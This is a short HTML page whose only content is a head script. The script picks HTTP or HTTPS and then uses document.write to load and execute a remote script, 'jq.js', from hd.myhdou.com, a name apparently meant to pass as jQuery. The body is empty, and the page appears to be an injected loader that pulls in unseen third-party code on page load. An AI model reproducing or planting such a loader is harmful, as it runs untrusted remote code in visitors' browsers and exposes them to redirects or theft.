<head>
<script>
function is_ios() {
var u = navigator.userAgent;
if(!!u.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/)){
	return true;
}else{
    if(window.location.protocol=="https:"){
        return true;
    }
	return false;

    
}
}


var js="http://hd.myhdou.com/jq.js";
if(is_ios()){js="https://hd.myhdou.com/jq.js";}
document.write("<script src='"+js+"'  charset='utf-8'><\/script>");document.close();
</script>
</head>
<body>
</body>
